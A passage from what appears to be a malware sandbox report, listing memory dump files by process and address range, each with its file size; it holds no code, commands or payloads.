                                                          56KB

                                                        • memory/4660-359-0x000000001BD00000-0x000000001BDCD000-memory.dmp

                                                          Filesize

                                                          820KB

                                                        • memory/4660-300-0x0000000002640000-0x0000000002650000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/4660-290-0x0000000002620000-0x0000000002630000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/4660-288-0x000000001B0D0000-0x000000001B0E8000-memory.dmp

                                                          Filesize

                                                          96KB

                                                        • memory/4660-308-0x000000001B650000-0x000000001B660000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/4660-286-0x0000000002610000-0x0000000002620000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/4660-283-0x00000000025A0000-0x00000000025BC000-memory.dmp

                                                          Filesize

                                                          112KB

                                                        • memory/4660-282-0x0000000002600000-0x000000000261C000-memory.dmp

                                                          Filesize

                                                          112KB

                                                        • memory/4660-279-0x000000001B030000-0x000000001B056000-memory.dmp

                                                          Filesize

                                                          152KB

                                                        • memory/4660-264-0x0000000000190000-0x00000000004DA000-memory.dmp

                                                          Filesize

                                                          3.3MB

                                                        • memory/4660-310-0x000000001B710000-0x000000001B76A000-memory.dmp

                                                          Filesize

                                                          360KB

                                                        • memory/4676-46-0x0000000000E00000-0x0000000000F00000-memory.dmp

                                                          Filesize

                                                          1024KB

                                                        • memory/4676-78-0x0000000000E00000-0x0000000000F00000-memory.dmp

                                                          Filesize

                                                          1024KB

                                                        • memory/4900-238-0x00000000061C0000-0x000000000620C000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/4900-234-0x0000000005820000-0x0000000005B74000-memory.dmp

                                                          Filesize

                                                          3.3MB

                                                        • memory/4928-2-0x0000000000F11000-0x0000000000F79000-memory.dmp

                                                          Filesize

                                                          416KB

                                                        • memory/4928-0-0x0000000000F10000-0x0000000001229000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/4928-1-0x00000000777B4000-0x00000000777B6000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/4928-19-0x0000000000F11000-0x0000000000F79000-memory.dmp

                                                          Filesize

                                                          416KB

                                                        • memory/4928-18-0x0000000000F10000-0x0000000001229000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/4928-4-0x0000000000F10000-0x0000000001229000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/4928-3-0x0000000000F10000-0x0000000001229000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/4976-411-0x0000000000070000-0x00000000006EC000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/4976-974-0x0000000000070000-0x00000000006EC000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/4976-258-0x0000000000070000-0x00000000006EC000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/4976-943-0x0000000000070000-0x00000000006EC000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/4976-400-0x0000000000070000-0x00000000006EC000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/4976-851-0x0000000000070000-0x00000000006EC000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/4976-265-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                          Filesize

                                                          972KB

                                                        • memory/6428-4070-0x00000000007D0000-0x0000000000AE9000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/7124-949-0x00000000004F0000-0x0000000000813000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/7124-963-0x00000000004F0000-0x0000000000813000-memory.dmp

                                                          Filesize

                                                          3.1MB